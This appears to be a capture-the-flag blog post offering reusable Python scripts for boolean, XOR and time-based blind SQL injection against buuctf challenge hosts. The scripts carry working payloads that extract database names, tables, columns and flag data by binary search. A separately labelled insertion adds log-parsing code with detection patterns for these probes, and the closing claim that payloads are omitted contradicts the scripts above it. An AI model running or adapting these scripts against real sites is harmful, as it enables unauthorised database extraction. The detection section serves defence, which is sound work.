The following scripts were all written by me (with reference to other people's work). The code may not be the most concise, but it is reasonably readable.
The core algorithm in every case is binary search; time-based blind injection is not recommended (speed is its hard limitation).
The script payloads reference these challenges: [第一章 web入门] SQL注入-2 / 极客大挑战 finilysql (buuctf)
1. Scripts that pass parameters via POST
When using them, change the POST parameters and their number.
1.1 Based on XOR blind injection, boolean-based blind injection, etc.:
import requests

url = 'http://736aa374-b497-441f-9b6a-a1c91f9b182b.node4.buuoj.cn:81/login.php'
flag = ''
for i in range(1, 1000):
    # Binary search over the printable ASCII range for the i-th character
    high = 127
    low = 32
    mid = (low + high) // 2
    while high > low:
        #payload = f"1' or ascii(substr(database(),{i},1))>{mid}#"  # database name
        #payload = f"1' or ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='note'),{i},1))>{mid}#"  # table names
        #payload = f"1' or ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='fl4g'),{i},1))>{mid}#"  # column names
        payload = f"1' or ascii(substr((seleCt(flag)from(fl4g)),{i},1))>{mid}#"  # data
        data = {
            "name": payload,
            "pass": 'qwer'
        }
        response = requests.post(url, data=data)
        if 'u6216' in response.text:  # marker of a "true" response: character is greater than mid
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    if low != 32:
        flag += chr(low)
    else:
        break  # no more characters
print(flag)
1.2 Based on time-based blind injection:
import requests
import time

url = 'http://736aa374-b497-441f-9b6a-a1c91f9b182b.node4.buuoj.cn:81/login.php'
flag = ''
for i in range(1, 1000):
    # Binary search over the printable ASCII range for the i-th character
    high = 127
    low = 32
    mid = (low + high) // 2
    while high > low:
        #payload = f"1' or if(ascii(substr(database(),{i},1))>{mid},sleep(2),1)#"  # database name
        #payload = f"1'or if(ascii(substr((seleCt(group_concat(table_name))from(information_schema.tables)where(table_schema)='note'),{i},1))>{mid},sleep(2),1)#"  # table names
        #payload = f"1'or if(ascii(substr((seleCt(group_concat(column_name))from(information_schema.columns)where(table_name)='users'),{i},1))>{mid},sleep(2),1)#"  # column names
        payload = f"1'or if(ascii(substr((seleCt(flag)from(fl4g)),{i},1))>{mid},sleep(2),1)#"  # data
        data = {
            "name": payload,
            "pass": 'qwer'
        }
        last = int(time.time())
        response = requests.post(url, data=data)
        now = int(time.time())
        if now - last > 1:  # the sleep(2) fired: character is greater than mid
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    if low != 32:
        flag += chr(low)
    else:
        break  # no more characters
print(flag)
2. Scripts that pass parameters via GET
Change the url and the matched text.
2.1 Based on XOR blind injection, boolean-based blind injection, etc.:
import requests

url = "http://d98fb290-369c-4ad8-8cd5-883846041dad.node4.buuoj.cn/search.php?id="
name = ''
for i in range(1, 1000):
    # Binary search over the printable ASCII range for the i-th character
    # (low/high instead of the builtin names min/max)
    low = 32
    high = 128
    while low < high:
        mid = (low + high) // 2
        payload = f"1^(ascii(substr(database(),{i},1))>{mid})#"  # database name
        #payload = f"1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),{i},1))>{mid})#"  # table names
        #payload = f"1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='F1naI1y'),{i},1))>{mid})#"  # column names
        #payload = f"1^(ascii(substr((select(group_concat(password))from(F1naI1y)),{i},1))>{mid})#"  # data
        response = requests.get(url=url + payload)
        if 'ERROR' in response.text:  # marker of a "true" response: character is greater than mid
            low = mid + 1
        else:
            high = mid
    if low != 32:
        name += chr(low)
    else:
        break  # no more characters
print(name)
2.2 Based on time-based blind injection:
import requests
import time

url = "http://d98fb290-369c-4ad8-8cd5-883846041dad.node4.buuoj.cn/search.php?id="
name = ''
for i in range(1, 1000):
    # Binary search over the printable ASCII range for the i-th character
    # (low/high instead of the builtin names min/max)
    low = 32
    high = 128
    while low < high:
        mid = (low + high) // 2
        # Payloads intentionally left blank here; write them for the challenge at hand (see note 1 below)
        payload = f" "  # database name
        #payload = f" "  # table names
        #payload = f" "  # column names
        #payload = f" "  # data
        last = int(time.time())
        response = requests.get(url=url + payload)
        now = int(time.time())
        if now - last > 1:  # the sleep fired: character is greater than mid
            low = mid + 1
        else:
            high = mid
    if low != 32:
        name += chr(low)
    else:
        break  # no more characters
print(name)
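Since every script above issues one request per bisection step, the probing leaves a distinctive trace in web server logs. The following Python is an added example for the defensive side (not part of the original post): it parses constructed Apache-style access log lines, URL-decodes each request target, classifies requests that carry the per-character comparison (ascii(substr(...))) or delay (sleep()) primitives the scripts rely on, and flags any client that sent several of them. The log lines, client IPs and thresholds are all constructed for the demonstration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache style), not from any real server. The first
# client mirrors the GET script above: one request per bisection step inside the 32..128 range.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /search.php?id=1%5E(ascii(substr(database(),1,1))%3E80)%23 HTTP/1.1" 200 512
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /search.php?id=1%5E(ascii(substr(database(),1,1))%3E104)%23 HTTP/1.1" 200 512
203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /search.php?id=1%5E(ascii(substr(database(),1,1))%3E116)%23 HTTP/1.1" 200 512
203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /search.php?id=1%5E(ascii(substr(database(),1,1))%3E110)%23 HTTP/1.1" 200 512
198.51.100.9 - - [01/Jan/2024:10:00:03 +0000] "GET /search.php?id=42 HTTP/1.1" 200 512
198.51.100.9 - - [01/Jan/2024:10:00:05 +0000] "GET /search.php?id=1%20and%20if(ascii(substr(database(),1,1))%3E80,sleep(2),1)%23 HTTP/1.1" 200 512
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" \d{3} \S+')
# Primitives the scripts above rely on: a per-character comparison, or a delay.
CHAR_PROBE = re.compile(r'ascii\s*\(\s*substr', re.I)
TIME_PROBE = re.compile(r'\b(?:sleep|benchmark)\s*\(', re.I)
THRESHOLD = re.compile(r'[><=]\s*(\d{2,3})\b')

def classify_request(target):
    """Return (kind, threshold) for one request target; kind is 'boolean', 'time' or None."""
    decoded = unquote_plus(target)
    if TIME_PROBE.search(decoded):
        kind = 'time'
    elif CHAR_PROBE.search(decoded):
        kind = 'boolean'
    else:
        return None, None
    m = THRESHOLD.search(decoded)
    return kind, (int(m.group(1)) if m else None)

def detect_blind_sqli(log_text, min_probes=3):
    """Group probe requests by client IP; return the IPs with at least min_probes probes,
    with the probe kinds seen, the count, and the threshold sequence (a narrowing series
    such as 80, 104, 116, 110 is the bisection signature)."""
    per_ip = defaultdict(lambda: {'kinds': set(), 'probes': 0, 'thresholds': []})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        kind, thr = classify_request(m.group('target'))
        if kind is None:
            continue
        rec = per_ip[m.group('ip')]
        rec['kinds'].add(kind)
        rec['probes'] += 1
        if thr is not None:
            rec['thresholds'].append(thr)
    return {ip: rec for ip, rec in per_ip.items() if rec['probes'] >= min_probes}
```

Running detect_blind_sqli(SAMPLE_LOG) flags only 203.0.113.7 with four boolean probes; lowering min_probes to 1 also surfaces the single time-based probe from 198.51.100.9.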
3. Notes
1. The payloads are not included; accumulate them gradually as you solve challenges. They are all available online, so write your own according to the challenge.
2. Avoid sleep whenever you can; it is far slower than the other methods.
3. With a poor network connection the script may print wrong characters; that is not a problem with the code.
4. My scripts may be imperfect; leave a comment if you find problems or have suggestions, and modify them yourself as needed.
5. More will be added when I come across new scripts or methods.